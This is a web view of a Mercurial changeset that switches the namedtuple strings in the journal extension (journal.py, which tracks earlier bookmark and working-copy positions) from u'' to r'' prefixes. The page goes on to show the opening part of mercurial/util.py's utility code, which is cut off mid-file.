##// END OF EJS Templates
global: use raw strings for namedtuple()...
Gregory Szorc -
r42000:7f63ec69 default
parent child Browse files
Show More
@@ -1,527 +1,527 b''
1 1 # journal.py
2 2 #
3 3 # Copyright 2014-2016 Facebook, Inc.
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7 """track previous positions of bookmarks (EXPERIMENTAL)
8 8
9 9 This extension adds a new command: `hg journal`, which shows you where
10 10 bookmarks were previously located.
11 11
12 12 """
13 13
14 14 from __future__ import absolute_import
15 15
16 16 import collections
17 17 import errno
18 18 import os
19 19 import weakref
20 20
21 21 from mercurial.i18n import _
22 22
23 23 from mercurial import (
24 24 bookmarks,
25 25 cmdutil,
26 26 dispatch,
27 27 encoding,
28 28 error,
29 29 extensions,
30 30 hg,
31 31 localrepo,
32 32 lock,
33 33 logcmdutil,
34 34 node,
35 35 pycompat,
36 36 registrar,
37 37 util,
38 38 )
39 39 from mercurial.utils import (
40 40 dateutil,
41 41 procutil,
42 42 stringutil,
43 43 )
44 44
45 45 cmdtable = {}
46 46 command = registrar.command(cmdtable)
47 47
48 48 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
49 49 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
50 50 # be specifying the version(s) of Mercurial they are tested with, or
51 51 # leave the attribute unspecified.
52 52 testedwith = 'ships-with-hg-core'
53 53
54 54 # storage format version; increment when the format changes
55 55 storageversion = 0
56 56
57 57 # namespaces
58 58 bookmarktype = 'bookmark'
59 59 wdirparenttype = 'wdirparent'
60 60 # In a shared repository, what shared feature name is used
61 61 # to indicate this namespace is shared with the source?
62 62 sharednamespaces = {
63 63 bookmarktype: hg.sharedbookmarks,
64 64 }
65 65
66 66 # Journal recording, register hooks and storage object
67 67 def extsetup(ui):
68 68 extensions.wrapfunction(dispatch, 'runcommand', runcommand)
69 69 extensions.wrapfunction(bookmarks.bmstore, '_write', recordbookmarks)
70 70 extensions.wrapfilecache(
71 71 localrepo.localrepository, 'dirstate', wrapdirstate)
72 72 extensions.wrapfunction(hg, 'postshare', wrappostshare)
73 73 extensions.wrapfunction(hg, 'copystore', unsharejournal)
74 74
75 75 def reposetup(ui, repo):
76 76 if repo.local():
77 77 repo.journal = journalstorage(repo)
78 78 repo._wlockfreeprefix.add('namejournal')
79 79
80 80 dirstate, cached = localrepo.isfilecached(repo, 'dirstate')
81 81 if cached:
82 82 # already instantiated dirstate isn't yet marked as
83 83 # "journal"-ing, even though repo.dirstate() was already
84 84 # wrapped by own wrapdirstate()
85 85 _setupdirstate(repo, dirstate)
86 86
87 87 def runcommand(orig, lui, repo, cmd, fullargs, *args):
88 88 """Track the command line options for recording in the journal"""
89 89 journalstorage.recordcommand(*fullargs)
90 90 return orig(lui, repo, cmd, fullargs, *args)
91 91
92 92 def _setupdirstate(repo, dirstate):
93 93 dirstate.journalstorage = repo.journal
94 94 dirstate.addparentchangecallback('journal', recorddirstateparents)
95 95
96 96 # hooks to record dirstate changes
97 97 def wrapdirstate(orig, repo):
98 98 """Make journal storage available to the dirstate object"""
99 99 dirstate = orig(repo)
100 100 if util.safehasattr(repo, 'journal'):
101 101 _setupdirstate(repo, dirstate)
102 102 return dirstate
103 103
104 104 def recorddirstateparents(dirstate, old, new):
105 105 """Records all dirstate parent changes in the journal."""
106 106 old = list(old)
107 107 new = list(new)
108 108 if util.safehasattr(dirstate, 'journalstorage'):
109 109 # only record two hashes if there was a merge
110 110 oldhashes = old[:1] if old[1] == node.nullid else old
111 111 newhashes = new[:1] if new[1] == node.nullid else new
112 112 dirstate.journalstorage.record(
113 113 wdirparenttype, '.', oldhashes, newhashes)
114 114
115 115 # hooks to record bookmark changes (both local and remote)
116 116 def recordbookmarks(orig, store, fp):
117 117 """Records all bookmark changes in the journal."""
118 118 repo = store._repo
119 119 if util.safehasattr(repo, 'journal'):
120 120 oldmarks = bookmarks.bmstore(repo)
121 121 for mark, value in store.iteritems():
122 122 oldvalue = oldmarks.get(mark, node.nullid)
123 123 if value != oldvalue:
124 124 repo.journal.record(bookmarktype, mark, oldvalue, value)
125 125 return orig(store, fp)
126 126
127 127 # shared repository support
128 128 def _readsharedfeatures(repo):
129 129 """A set of shared features for this repository"""
130 130 try:
131 131 return set(repo.vfs.read('shared').splitlines())
132 132 except IOError as inst:
133 133 if inst.errno != errno.ENOENT:
134 134 raise
135 135 return set()
136 136
137 137 def _mergeentriesiter(*iterables, **kwargs):
138 138 """Given a set of sorted iterables, yield the next entry in merged order
139 139
140 140 Note that by default entries go from most recent to oldest.
141 141 """
142 142 order = kwargs.pop(r'order', max)
143 143 iterables = [iter(it) for it in iterables]
144 144 # this tracks still active iterables; iterables are deleted as they are
145 145 # exhausted, which is why this is a dictionary and why each entry also
146 146 # stores the key. Entries are mutable so we can store the next value each
147 147 # time.
148 148 iterable_map = {}
149 149 for key, it in enumerate(iterables):
150 150 try:
151 151 iterable_map[key] = [next(it), key, it]
152 152 except StopIteration:
153 153 # empty entry, can be ignored
154 154 pass
155 155
156 156 while iterable_map:
157 157 value, key, it = order(iterable_map.itervalues())
158 158 yield value
159 159 try:
160 160 iterable_map[key][0] = next(it)
161 161 except StopIteration:
162 162 # this iterable is empty, remove it from consideration
163 163 del iterable_map[key]
164 164
165 165 def wrappostshare(orig, sourcerepo, destrepo, **kwargs):
166 166 """Mark this shared working copy as sharing journal information"""
167 167 with destrepo.wlock():
168 168 orig(sourcerepo, destrepo, **kwargs)
169 169 with destrepo.vfs('shared', 'a') as fp:
170 170 fp.write('journal\n')
171 171
172 172 def unsharejournal(orig, ui, repo, repopath):
173 173 """Copy shared journal entries into this repo when unsharing"""
174 174 if (repo.path == repopath and repo.shared() and
175 175 util.safehasattr(repo, 'journal')):
176 176 sharedrepo = hg.sharedreposource(repo)
177 177 sharedfeatures = _readsharedfeatures(repo)
178 178 if sharedrepo and sharedfeatures > {'journal'}:
179 179 # there is a shared repository and there are shared journal entries
180 180 # to copy. move shared date over from source to destination but
181 181 # move the local file first
182 182 if repo.vfs.exists('namejournal'):
183 183 journalpath = repo.vfs.join('namejournal')
184 184 util.rename(journalpath, journalpath + '.bak')
185 185 storage = repo.journal
186 186 local = storage._open(
187 187 repo.vfs, filename='namejournal.bak', _newestfirst=False)
188 188 shared = (
189 189 e for e in storage._open(sharedrepo.vfs, _newestfirst=False)
190 190 if sharednamespaces.get(e.namespace) in sharedfeatures)
191 191 for entry in _mergeentriesiter(local, shared, order=min):
192 192 storage._write(repo.vfs, entry)
193 193
194 194 return orig(ui, repo, repopath)
195 195
196 196 class journalentry(collections.namedtuple(
197 u'journalentry',
198 u'timestamp user command namespace name oldhashes newhashes')):
197 r'journalentry',
198 r'timestamp user command namespace name oldhashes newhashes')):
199 199 """Individual journal entry
200 200
201 201 * timestamp: a mercurial (time, timezone) tuple
202 202 * user: the username that ran the command
203 203 * namespace: the entry namespace, an opaque string
204 204 * name: the name of the changed item, opaque string with meaning in the
205 205 namespace
206 206 * command: the hg command that triggered this record
207 207 * oldhashes: a tuple of one or more binary hashes for the old location
208 208 * newhashes: a tuple of one or more binary hashes for the new location
209 209
210 210 Handles serialisation from and to the storage format. Fields are
211 211 separated by newlines, hashes are written out in hex separated by commas,
212 212 timestamp and timezone are separated by a space.
213 213
214 214 """
215 215 @classmethod
216 216 def fromstorage(cls, line):
217 217 (time, user, command, namespace, name,
218 218 oldhashes, newhashes) = line.split('\n')
219 219 timestamp, tz = time.split()
220 220 timestamp, tz = float(timestamp), int(tz)
221 221 oldhashes = tuple(node.bin(hash) for hash in oldhashes.split(','))
222 222 newhashes = tuple(node.bin(hash) for hash in newhashes.split(','))
223 223 return cls(
224 224 (timestamp, tz), user, command, namespace, name,
225 225 oldhashes, newhashes)
226 226
227 227 def __bytes__(self):
228 228 """bytes representation for storage"""
229 229 time = ' '.join(map(pycompat.bytestr, self.timestamp))
230 230 oldhashes = ','.join([node.hex(hash) for hash in self.oldhashes])
231 231 newhashes = ','.join([node.hex(hash) for hash in self.newhashes])
232 232 return '\n'.join((
233 233 time, self.user, self.command, self.namespace, self.name,
234 234 oldhashes, newhashes))
235 235
236 236 __str__ = encoding.strmethod(__bytes__)
237 237
238 238 class journalstorage(object):
239 239 """Storage for journal entries
240 240
241 241 Entries are divided over two files; one with entries that pertain to the
242 242 local working copy *only*, and one with entries that are shared across
243 243 multiple working copies when shared using the share extension.
244 244
245 245 Entries are stored with NUL bytes as separators. See the journalentry
246 246 class for the per-entry structure.
247 247
248 248 The file format starts with an integer version, delimited by a NUL.
249 249
250 250 This storage uses a dedicated lock; this makes it easier to avoid issues
251 251 with adding entries that added when the regular wlock is unlocked (e.g.
252 252 the dirstate).
253 253
254 254 """
255 255 _currentcommand = ()
256 256 _lockref = None
257 257
258 258 def __init__(self, repo):
259 259 self.user = procutil.getuser()
260 260 self.ui = repo.ui
261 261 self.vfs = repo.vfs
262 262
263 263 # is this working copy using a shared storage?
264 264 self.sharedfeatures = self.sharedvfs = None
265 265 if repo.shared():
266 266 features = _readsharedfeatures(repo)
267 267 sharedrepo = hg.sharedreposource(repo)
268 268 if sharedrepo is not None and 'journal' in features:
269 269 self.sharedvfs = sharedrepo.vfs
270 270 self.sharedfeatures = features
271 271
272 272 # track the current command for recording in journal entries
273 273 @property
274 274 def command(self):
275 275 commandstr = ' '.join(
276 276 map(procutil.shellquote, journalstorage._currentcommand))
277 277 if '\n' in commandstr:
278 278 # truncate multi-line commands
279 279 commandstr = commandstr.partition('\n')[0] + ' ...'
280 280 return commandstr
281 281
282 282 @classmethod
283 283 def recordcommand(cls, *fullargs):
284 284 """Set the current hg arguments, stored with recorded entries"""
285 285 # Set the current command on the class because we may have started
286 286 # with a non-local repo (cloning for example).
287 287 cls._currentcommand = fullargs
288 288
289 289 def _currentlock(self, lockref):
290 290 """Returns the lock if it's held, or None if it's not.
291 291
292 292 (This is copied from the localrepo class)
293 293 """
294 294 if lockref is None:
295 295 return None
296 296 l = lockref()
297 297 if l is None or not l.held:
298 298 return None
299 299 return l
300 300
301 301 def jlock(self, vfs):
302 302 """Create a lock for the journal file"""
303 303 if self._currentlock(self._lockref) is not None:
304 304 raise error.Abort(_('journal lock does not support nesting'))
305 305 desc = _('journal of %s') % vfs.base
306 306 try:
307 307 l = lock.lock(vfs, 'namejournal.lock', 0, desc=desc)
308 308 except error.LockHeld as inst:
309 309 self.ui.warn(
310 310 _("waiting for lock on %s held by %r\n") % (desc, inst.locker))
311 311 # default to 600 seconds timeout
312 312 l = lock.lock(
313 313 vfs, 'namejournal.lock',
314 314 self.ui.configint("ui", "timeout"), desc=desc)
315 315 self.ui.warn(_("got lock after %s seconds\n") % l.delay)
316 316 self._lockref = weakref.ref(l)
317 317 return l
318 318
319 319 def record(self, namespace, name, oldhashes, newhashes):
320 320 """Record a new journal entry
321 321
322 322 * namespace: an opaque string; this can be used to filter on the type
323 323 of recorded entries.
324 324 * name: the name defining this entry; for bookmarks, this is the
325 325 bookmark name. Can be filtered on when retrieving entries.
326 326 * oldhashes and newhashes: each a single binary hash, or a list of
327 327 binary hashes. These represent the old and new position of the named
328 328 item.
329 329
330 330 """
331 331 if not isinstance(oldhashes, list):
332 332 oldhashes = [oldhashes]
333 333 if not isinstance(newhashes, list):
334 334 newhashes = [newhashes]
335 335
336 336 entry = journalentry(
337 337 dateutil.makedate(), self.user, self.command, namespace, name,
338 338 oldhashes, newhashes)
339 339
340 340 vfs = self.vfs
341 341 if self.sharedvfs is not None:
342 342 # write to the shared repository if this feature is being
343 343 # shared between working copies.
344 344 if sharednamespaces.get(namespace) in self.sharedfeatures:
345 345 vfs = self.sharedvfs
346 346
347 347 self._write(vfs, entry)
348 348
349 349 def _write(self, vfs, entry):
350 350 with self.jlock(vfs):
351 351 # open file in amend mode to ensure it is created if missing
352 352 with vfs('namejournal', mode='a+b') as f:
353 353 f.seek(0, os.SEEK_SET)
354 354 # Read just enough bytes to get a version number (up to 2
355 355 # digits plus separator)
356 356 version = f.read(3).partition('\0')[0]
357 357 if version and version != "%d" % storageversion:
358 358 # different version of the storage. Exit early (and not
359 359 # write anything) if this is not a version we can handle or
360 360 # the file is corrupt. In future, perhaps rotate the file
361 361 # instead?
362 362 self.ui.warn(
363 363 _("unsupported journal file version '%s'\n") % version)
364 364 return
365 365 if not version:
366 366 # empty file, write version first
367 367 f.write(("%d" % storageversion) + '\0')
368 368 f.seek(0, os.SEEK_END)
369 369 f.write(bytes(entry) + '\0')
370 370
371 371 def filtered(self, namespace=None, name=None):
372 372 """Yield all journal entries with the given namespace or name
373 373
374 374 Both the namespace and the name are optional; if neither is given all
375 375 entries in the journal are produced.
376 376
377 377 Matching supports regular expressions by using the `re:` prefix
378 378 (use `literal:` to match names or namespaces that start with `re:`)
379 379
380 380 """
381 381 if namespace is not None:
382 382 namespace = stringutil.stringmatcher(namespace)[-1]
383 383 if name is not None:
384 384 name = stringutil.stringmatcher(name)[-1]
385 385 for entry in self:
386 386 if namespace is not None and not namespace(entry.namespace):
387 387 continue
388 388 if name is not None and not name(entry.name):
389 389 continue
390 390 yield entry
391 391
392 392 def __iter__(self):
393 393 """Iterate over the storage
394 394
395 395 Yields journalentry instances for each contained journal record.
396 396
397 397 """
398 398 local = self._open(self.vfs)
399 399
400 400 if self.sharedvfs is None:
401 401 return local
402 402
403 403 # iterate over both local and shared entries, but only those
404 404 # shared entries that are among the currently shared features
405 405 shared = (
406 406 e for e in self._open(self.sharedvfs)
407 407 if sharednamespaces.get(e.namespace) in self.sharedfeatures)
408 408 return _mergeentriesiter(local, shared)
409 409
410 410 def _open(self, vfs, filename='namejournal', _newestfirst=True):
411 411 if not vfs.exists(filename):
412 412 return
413 413
414 414 with vfs(filename) as f:
415 415 raw = f.read()
416 416
417 417 lines = raw.split('\0')
418 418 version = lines and lines[0]
419 419 if version != "%d" % storageversion:
420 420 version = version or _('not available')
421 421 raise error.Abort(_("unknown journal file version '%s'") % version)
422 422
423 423 # Skip the first line, it's a version number. Normally we iterate over
424 424 # these in reverse order to list newest first; only when copying across
425 425 # a shared storage do we forgo reversing.
426 426 lines = lines[1:]
427 427 if _newestfirst:
428 428 lines = reversed(lines)
429 429 for line in lines:
430 430 if not line:
431 431 continue
432 432 yield journalentry.fromstorage(line)
433 433
434 434 # journal reading
435 435 # log options that don't make sense for journal
436 436 _ignoreopts = ('no-merges', 'graph')
437 437 @command(
438 438 'journal', [
439 439 ('', 'all', None, 'show history for all names'),
440 440 ('c', 'commits', None, 'show commit metadata'),
441 441 ] + [opt for opt in cmdutil.logopts if opt[1] not in _ignoreopts],
442 442 '[OPTION]... [BOOKMARKNAME]',
443 443 helpcategory=command.CATEGORY_CHANGE_ORGANIZATION)
444 444 def journal(ui, repo, *args, **opts):
445 445 """show the previous position of bookmarks and the working copy
446 446
447 447 The journal is used to see the previous commits that bookmarks and the
448 448 working copy pointed to. By default the previous locations for the working
449 449 copy. Passing a bookmark name will show all the previous positions of
450 450 that bookmark. Use the --all switch to show previous locations for all
451 451 bookmarks and the working copy; each line will then include the bookmark
452 452 name, or '.' for the working copy, as well.
453 453
454 454 If `name` starts with `re:`, the remainder of the name is treated as
455 455 a regular expression. To match a name that actually starts with `re:`,
456 456 use the prefix `literal:`.
457 457
458 458 By default hg journal only shows the commit hash and the command that was
459 459 running at that time. -v/--verbose will show the prior hash, the user, and
460 460 the time at which it happened.
461 461
462 462 Use -c/--commits to output log information on each commit hash; at this
463 463 point you can use the usual `--patch`, `--git`, `--stat` and `--template`
464 464 switches to alter the log output for these.
465 465
466 466 `hg journal -T json` can be used to produce machine readable output.
467 467
468 468 """
469 469 opts = pycompat.byteskwargs(opts)
470 470 name = '.'
471 471 if opts.get('all'):
472 472 if args:
473 473 raise error.Abort(
474 474 _("You can't combine --all and filtering on a name"))
475 475 name = None
476 476 if args:
477 477 name = args[0]
478 478
479 479 fm = ui.formatter('journal', opts)
480 480 def formatnodes(nodes):
481 481 return fm.formatlist(map(fm.hexfunc, nodes), name='node', sep=',')
482 482
483 483 if opts.get("template") != "json":
484 484 if name is None:
485 485 displayname = _('the working copy and bookmarks')
486 486 else:
487 487 displayname = "'%s'" % name
488 488 ui.status(_("previous locations of %s:\n") % displayname)
489 489
490 490 limit = logcmdutil.getlimit(opts)
491 491 entry = None
492 492 ui.pager('journal')
493 493 for count, entry in enumerate(repo.journal.filtered(name=name)):
494 494 if count == limit:
495 495 break
496 496
497 497 fm.startitem()
498 498 fm.condwrite(ui.verbose, 'oldnodes', '%s -> ',
499 499 formatnodes(entry.oldhashes))
500 500 fm.write('newnodes', '%s', formatnodes(entry.newhashes))
501 501 fm.condwrite(ui.verbose, 'user', ' %-8s', entry.user)
502 502 fm.condwrite(
503 503 opts.get('all') or name.startswith('re:'),
504 504 'name', ' %-8s', entry.name)
505 505
506 506 fm.condwrite(ui.verbose, 'date', ' %s',
507 507 fm.formatdate(entry.timestamp, '%Y-%m-%d %H:%M %1%2'))
508 508 fm.write('command', ' %s\n', entry.command)
509 509
510 510 if opts.get("commits"):
511 511 if fm.isplain():
512 512 displayer = logcmdutil.changesetdisplayer(ui, repo, opts)
513 513 else:
514 514 displayer = logcmdutil.changesetformatter(
515 515 ui, repo, fm.nested('changesets'), diffopts=opts)
516 516 for hash in entry.newhashes:
517 517 try:
518 518 ctx = repo[hash]
519 519 displayer.show(ctx)
520 520 except error.RepoLookupError as e:
521 521 fm.plain("%s\n\n" % pycompat.bytestr(e))
522 522 displayer.close()
523 523
524 524 fm.end()
525 525
526 526 if entry is None:
527 527 ui.status(_("no recorded locations\n"))
@@ -1,4021 +1,4021 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 readlink = platform.readlink
116 116 rename = platform.rename
117 117 removedirs = platform.removedirs
118 118 samedevice = platform.samedevice
119 119 samefile = platform.samefile
120 120 samestat = platform.samestat
121 121 setflags = platform.setflags
122 122 split = platform.split
123 123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 124 statisexec = platform.statisexec
125 125 statislink = platform.statislink
126 126 umask = platform.umask
127 127 unlink = platform.unlink
128 128 username = platform.username
129 129
130 130 try:
131 131 recvfds = osutil.recvfds
132 132 except AttributeError:
133 133 pass
134 134
135 135 # Python compatibility
136 136
137 137 _notset = object()
138 138
139 139 def bitsfrom(container):
140 140 bits = 0
141 141 for bit in container:
142 142 bits |= bit
143 143 return bits
144 144
145 145 # python 2.6 still have deprecation warning enabled by default. We do not want
146 146 # to display anything to standard user so detect if we are running test and
147 147 # only use python deprecation warning in this case.
148 148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
149 149 if _dowarn:
150 150 # explicitly unfilter our warning for python 2.7
151 151 #
152 152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
153 153 # However, module name set through PYTHONWARNINGS was exactly matched, so
154 154 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
155 155 # makes the whole PYTHONWARNINGS thing useless for our usecase.
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
158 158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
159 159 if _dowarn and pycompat.ispy3:
160 160 # silence warning emitted by passing user string to re.sub()
161 161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
162 162 r'mercurial')
163 163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
164 164 DeprecationWarning, r'mercurial')
165 165 # TODO: reinvent imp.is_frozen()
166 166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
167 167 DeprecationWarning, r'mercurial')
168 168
169 169 def nouideprecwarn(msg, version, stacklevel=1):
170 170 """Issue an python native deprecation warning
171 171
172 172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
173 173 """
174 174 if _dowarn:
175 175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
176 176 " update your code.)") % version
177 177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
178 178
179 179 DIGESTS = {
180 180 'md5': hashlib.md5,
181 181 'sha1': hashlib.sha1,
182 182 'sha512': hashlib.sha512,
183 183 }
184 184 # List of digest types from strongest to weakest
185 185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
186 186
187 187 for k in DIGESTS_BY_STRENGTH:
188 188 assert k in DIGESTS
189 189
190 190 class digester(object):
191 191 """helper to compute digests.
192 192
193 193 This helper can be used to compute one or more digests given their name.
194 194
195 195 >>> d = digester([b'md5', b'sha1'])
196 196 >>> d.update(b'foo')
197 197 >>> [k for k in sorted(d)]
198 198 ['md5', 'sha1']
199 199 >>> d[b'md5']
200 200 'acbd18db4cc2f85cedef654fccc4a4d8'
201 201 >>> d[b'sha1']
202 202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
203 203 >>> digester.preferred([b'md5', b'sha1'])
204 204 'sha1'
205 205 """
206 206
207 207 def __init__(self, digests, s=''):
208 208 self._hashes = {}
209 209 for k in digests:
210 210 if k not in DIGESTS:
211 211 raise error.Abort(_('unknown digest type: %s') % k)
212 212 self._hashes[k] = DIGESTS[k]()
213 213 if s:
214 214 self.update(s)
215 215
216 216 def update(self, data):
217 217 for h in self._hashes.values():
218 218 h.update(data)
219 219
220 220 def __getitem__(self, key):
221 221 if key not in DIGESTS:
222 222 raise error.Abort(_('unknown digest type: %s') % k)
223 223 return nodemod.hex(self._hashes[key].digest())
224 224
225 225 def __iter__(self):
226 226 return iter(self._hashes)
227 227
228 228 @staticmethod
229 229 def preferred(supported):
230 230 """returns the strongest digest type in both supported and DIGESTS."""
231 231
232 232 for k in DIGESTS_BY_STRENGTH:
233 233 if k in supported:
234 234 return k
235 235 return None
236 236
237 237 class digestchecker(object):
238 238 """file handle wrapper that additionally checks content against a given
239 239 size and digests.
240 240
241 241 d = digestchecker(fh, size, {'md5': '...'})
242 242
243 243 When multiple digests are given, all of them are validated.
244 244 """
245 245
246 246 def __init__(self, fh, size, digests):
247 247 self._fh = fh
248 248 self._size = size
249 249 self._got = 0
250 250 self._digests = dict(digests)
251 251 self._digester = digester(self._digests.keys())
252 252
253 253 def read(self, length=-1):
254 254 content = self._fh.read(length)
255 255 self._digester.update(content)
256 256 self._got += len(content)
257 257 return content
258 258
259 259 def validate(self):
260 260 if self._size != self._got:
261 261 raise error.Abort(_('size mismatch: expected %d, got %d') %
262 262 (self._size, self._got))
263 263 for k, v in self._digests.items():
264 264 if v != self._digester[k]:
265 265 # i18n: first parameter is a digest name
266 266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
267 267 (k, v, self._digester[k]))
268 268
269 269 try:
270 270 buffer = buffer
271 271 except NameError:
272 272 def buffer(sliceable, offset=0, length=None):
273 273 if length is not None:
274 274 return memoryview(sliceable)[offset:offset + length]
275 275 return memoryview(sliceable)[offset:]
276 276
277 277 _chunksize = 4096
278 278
279 279 class bufferedinputpipe(object):
280 280 """a manually buffered input pipe
281 281
282 282 Python will not let us use buffered IO and lazy reading with 'polling' at
283 283 the same time. We cannot probe the buffer state and select will not detect
284 284 that data are ready to read if they are already buffered.
285 285
286 286 This class let us work around that by implementing its own buffering
287 287 (allowing efficient readline) while offering a way to know if the buffer is
288 288 empty from the output (allowing collaboration of the buffer with polling).
289 289
290 290 This class lives in the 'util' module because it makes use of the 'os'
291 291 module from the python stdlib.
292 292 """
293 293 def __new__(cls, fh):
294 294 # If we receive a fileobjectproxy, we need to use a variation of this
295 295 # class that notifies observers about activity.
296 296 if isinstance(fh, fileobjectproxy):
297 297 cls = observedbufferedinputpipe
298 298
299 299 return super(bufferedinputpipe, cls).__new__(cls)
300 300
301 301 def __init__(self, input):
302 302 self._input = input
303 303 self._buffer = []
304 304 self._eof = False
305 305 self._lenbuf = 0
306 306
307 307 @property
308 308 def hasbuffer(self):
309 309 """True is any data is currently buffered
310 310
311 311 This will be used externally a pre-step for polling IO. If there is
312 312 already data then no polling should be set in place."""
313 313 return bool(self._buffer)
314 314
315 315 @property
316 316 def closed(self):
317 317 return self._input.closed
318 318
319 319 def fileno(self):
320 320 return self._input.fileno()
321 321
322 322 def close(self):
323 323 return self._input.close()
324 324
325 325 def read(self, size):
326 326 while (not self._eof) and (self._lenbuf < size):
327 327 self._fillbuffer()
328 328 return self._frombuffer(size)
329 329
330 330 def unbufferedread(self, size):
331 331 if not self._eof and self._lenbuf == 0:
332 332 self._fillbuffer(max(size, _chunksize))
333 333 return self._frombuffer(min(self._lenbuf, size))
334 334
335 335 def readline(self, *args, **kwargs):
336 336 if len(self._buffer) > 1:
337 337 # this should not happen because both read and readline end with a
338 338 # _frombuffer call that collapse it.
339 339 self._buffer = [''.join(self._buffer)]
340 340 self._lenbuf = len(self._buffer[0])
341 341 lfi = -1
342 342 if self._buffer:
343 343 lfi = self._buffer[-1].find('\n')
344 344 while (not self._eof) and lfi < 0:
345 345 self._fillbuffer()
346 346 if self._buffer:
347 347 lfi = self._buffer[-1].find('\n')
348 348 size = lfi + 1
349 349 if lfi < 0: # end of file
350 350 size = self._lenbuf
351 351 elif len(self._buffer) > 1:
352 352 # we need to take previous chunks into account
353 353 size += self._lenbuf - len(self._buffer[-1])
354 354 return self._frombuffer(size)
355 355
356 356 def _frombuffer(self, size):
357 357 """return at most 'size' data from the buffer
358 358
359 359 The data are removed from the buffer."""
360 360 if size == 0 or not self._buffer:
361 361 return ''
362 362 buf = self._buffer[0]
363 363 if len(self._buffer) > 1:
364 364 buf = ''.join(self._buffer)
365 365
366 366 data = buf[:size]
367 367 buf = buf[len(data):]
368 368 if buf:
369 369 self._buffer = [buf]
370 370 self._lenbuf = len(buf)
371 371 else:
372 372 self._buffer = []
373 373 self._lenbuf = 0
374 374 return data
375 375
376 376 def _fillbuffer(self, size=_chunksize):
377 377 """read data to the buffer"""
378 378 data = os.read(self._input.fileno(), size)
379 379 if not data:
380 380 self._eof = True
381 381 else:
382 382 self._lenbuf += len(data)
383 383 self._buffer.append(data)
384 384
385 385 return data
386 386
387 387 def mmapread(fp):
388 388 try:
389 389 fd = getattr(fp, 'fileno', lambda: fp)()
390 390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
391 391 except ValueError:
392 392 # Empty files cannot be mmapped, but mmapread should still work. Check
393 393 # if the file is empty, and if so, return an empty buffer.
394 394 if os.fstat(fd).st_size == 0:
395 395 return ''
396 396 raise
397 397
398 398 class fileobjectproxy(object):
399 399 """A proxy around file objects that tells a watcher when events occur.
400 400
401 401 This type is intended to only be used for testing purposes. Think hard
402 402 before using it in important code.
403 403 """
404 404 __slots__ = (
405 405 r'_orig',
